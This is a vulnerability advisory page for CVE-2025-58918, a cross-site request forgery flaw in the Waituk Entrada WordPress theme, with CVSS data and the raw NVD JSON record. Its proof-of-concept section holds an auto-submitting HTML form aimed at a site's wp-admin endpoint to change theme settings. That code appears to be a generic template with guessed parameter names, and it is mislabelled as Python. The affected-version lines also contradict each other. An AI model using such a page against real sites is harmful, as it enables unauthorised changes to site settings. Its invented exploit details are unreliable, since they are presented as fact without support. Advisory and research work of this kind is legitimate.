Security Vulnerability Report
中文
CVE-2025-58918 CVSS 4.3 MEDIUM

CVE-2025-58918

Published: 2025-10-27 03:15:51
Last Modified: 2026-04-28 19:34:22

Description

Cross-Site Request Forgery (CSRF) vulnerability in Waituk Entrada theme allows Cross Site Request Forgery.This issue affects Entrada: from n/a through 5.7.7.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Waituk Entrada Theme < 5.7.7
Entrada Theme (n/a through 5.7.7)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-58918 - Entrada Theme CSRF --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-58918</title> </head> <body> <h1>CSRF PoC for Entrada Theme</h1> <p>This is a proof-of-concept for CVE-2025-58918</p> <!-- Example: Malicious form to trigger theme settings change --> <form action="https://target-site.com/wp-admin/admin-post.php" method="POST" id="csrfForm"> <input type="hidden" name="action" value="entrada_settings_update"> <input type="hidden" name="setting_name" value="malicious_value"> <input type="hidden" name="submit" value="1"> <!-- Additional hidden fields to match expected parameters --> </form> <script> // Auto-submit form when page loads document.getElementById('csrfForm').submit(); // Log for debugging console.log('CSRF PoC executed'); </script> <!-- Alternative: Image tag with src pointing to vulnerable endpoint --> <!-- <img src="https://target-site.com/wp-admin/admin.php?page=entrada-settings&action=malicious_action" width="0" height="0"> --> <p>If you see this message after form submission, the attack may have succeeded.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58918", "sourceIdentifier": "[email protected]", "published": "2025-10-27T03:15:50.900", "lastModified": "2026-04-28T19:34:22.230", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Waituk Entrada theme allows Cross Site Request Forgery.This issue affects Entrada: from n/a through 5.7.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/WordPress/Theme/entrada/vulnerability/wordpress-entrada-theme-5-7-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}